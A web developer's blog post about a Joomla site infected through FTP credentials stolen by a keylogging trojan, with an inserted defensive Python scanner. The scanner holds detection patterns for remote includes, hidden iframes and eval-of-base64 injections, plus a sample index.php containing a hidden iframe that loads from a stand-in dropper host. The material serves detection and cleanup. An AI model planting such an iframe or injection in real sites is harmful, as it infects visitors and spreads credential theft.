Today I got one of those client emails we all dread. The client had visited his brand new site and it wouldn't load; it just gave a blank screen.
Experienced web developers know that a blank screen is really an error message, so I dug a little further and checked his site with my FTP client. Not surprisingly, I saw that some malicious code had been inserted into the index.php files. Fortunately there was a bug in this code, and that is what gave the blank screen.
How did the code get there?
The usual answers are:
- the Joomla install is poorly configured and the file permissions are wrong, e.g. 777
- the site has some known insecure extension
- the Joomla install is outdated
- insecure passwords
But in this case the site was a clean install of the latest release of Joomla with no extensions and secure file permissions. Even the passwords were all complex non-dictionary words; no p4ssw0rd or q1w2e3r4 here.
So now I was thinking it was a server hack. After all, it was a shared hosting solution; perhaps another site on the server had been exploited, giving a hacker root access to every site on the shared host.
But that wasn't the case.
By doing a little research online I discovered a report of 40,000 sites being hacked on the same day with the same, or similar, code injected into the sites. None of those sites were Joomla-powered, they were hosted on multiple servers, and many of them had secure passwords.
What the reporter did, though, was to investigate exactly what the injected code was trying to do, to see if there were any clues there.
So what did the code do?
This tiny snippet of code would include a trojan from another site, which would be downloaded to your site visitors' computers. Once downloaded, this trojan would record keystrokes and then upload them to a naughty person. And what was in the keystrokes? The secure FTP usernames and passwords.
With those usernames and passwords the naughty person was then able to FTP into new sites and add their code, and thus repeat the cycle of end-user computer infection.
Who knows what other keystrokes they captured and were planning to use.
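The triage step above (open the site over FTP, find injected code in index.php) and the description of what the snippet did (pull a dropper from another site into the visitor's browser) can both be turned into a defender's scan. The following is an added example, not code from the original post: it walks a PHP web root looking for the injection shapes described here (a remote include, a hidden zero-size iframe, or an eval of an obfuscated payload) and at the same time flags world-writable files, the "777" mistake from the list of usual causes. The regexes, the domain dropper.example and the two sample index.php files are all constructed for illustration and are not the actual code from the client's site.

```python
"""
Added example (not from the original post): a defender's triage scan for a
PHP web root. It flags
  * injected code in .php files (remote include, hidden iframe, eval of an
    obfuscated payload), and
  * world-writable files, i.e. the '777' mis-permission.
All patterns and sample files below are constructed for illustration.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Regexes for common injection shapes. Constructed; tune them for your own site.
SUSPICIOUS_PATTERNS = {
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"](?:https?|ftp)://", re.I),
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*['\"]?0\b)",
        re.I | re.S),
    "eval_obfuscated": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
}


def scan_php_file(path):
    """Return a list of (path, pattern_name, line_number) hits for one file."""
    hits = []
    try:
        text = Path(path).read_text(encoding="utf-8", errors="replace")
    except OSError:
        return hits
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        for match in pattern.finditer(text):
            line_no = text.count("\n", 0, match.start()) + 1
            hits.append((str(path), name, line_no))
    return hits


def is_world_writable(path):
    """True if 'other' has write permission (the 0o777 / 0o666 mistake)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def scan_webroot(root):
    """Walk a web root; return {'injections': [...], 'world_writable': [...]}."""
    report = {"injections": [], "world_writable": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            full = os.path.join(dirpath, entry)
            if is_world_writable(full):
                report["world_writable"].append(full)
        for name in filenames:
            if name.endswith(".php"):
                report["injections"].extend(scan_php_file(os.path.join(dirpath, name)))
    return report


# Constructed sample files standing in for two small sites on one web root.
CLEAN_INDEX = "<?php\ndefine('_JEXEC', 1);\nrequire_once __DIR__ . '/includes/app.php';\n"
INJECTED_INDEX = (
    "<?php\n"
    "define('_JEXEC', 1);\n"
    "require_once __DIR__ . '/includes/app.php';\n"
    "// constructed dropper line of the kind described in the post\n"
    "echo '<iframe src=\"http://dropper.example/t.php\" width=\"0\" height=\"0\" "
    "style=\"visibility:hidden\"></iframe>';\n"
)


def demo():
    """Build the sample tree in a temp dir, scan it, return (report, root)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    site_a = Path(root, "site_a")
    site_b = Path(root, "site_b")
    site_a.mkdir()
    site_b.mkdir()
    (site_a / "index.php").write_text(CLEAN_INDEX)
    (site_b / "index.php").write_text(INJECTED_INDEX)
    # Reproduce the '777' misconfiguration on the infected site's index.php.
    os.chmod(site_b / "index.php", 0o777)
    return scan_webroot(root), root


if __name__ == "__main__":
    result, where = demo()
    for path, kind, line in result["injections"]:
        print(f"INJECTED  {kind:16s} {path}:{line}")
    for path in result["world_writable"]:
        print(f"WRITABLE  {path}")
```

Run it against a real web root with `scan_webroot("/path/to/htdocs")` from a machine you trust, not from the possibly infected desktop that typed the FTP password in the first place. A hit is a reason to diff the file against a known-good copy from the Joomla release, not proof on its own; the pattern list is deliberately short and will miss anything the attacker encodes differently.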
Interestingly, during my investigations I came across a PHP forum where a user said:
"Help my web site stopped working. I've looked at the code and I found the following code..."
This was the exact same code snippet as on my client's web site, and what was the reply on the forum? Not what you would expect.
"the syntax in your php is wrong, the correct way to insert that file is..."
So now the user is happy, his web site is back up and running... of course it is happily infecting all his site visitors as well, but he didn't seem to be bothered about that.
I also saw a "security expert" recommending blocking a certain IP address associated with this attack with an .htaccess rule. This is foolish advice, as obviously a hacker can easily use a proxy server to change their IP address. In this case it would also not have worked even if the hacker was using the blocked IP address: an .htaccess rule only controls web access, and the hacker was using FTP. (If you really want to block IP addresses then you need to do it at the server level with a firewall.)
The morals of the story:
There is no point in following all the best Joomla security advice you can find if you don't take the simple step of securing your own personal computer with up-to-date anti-virus software.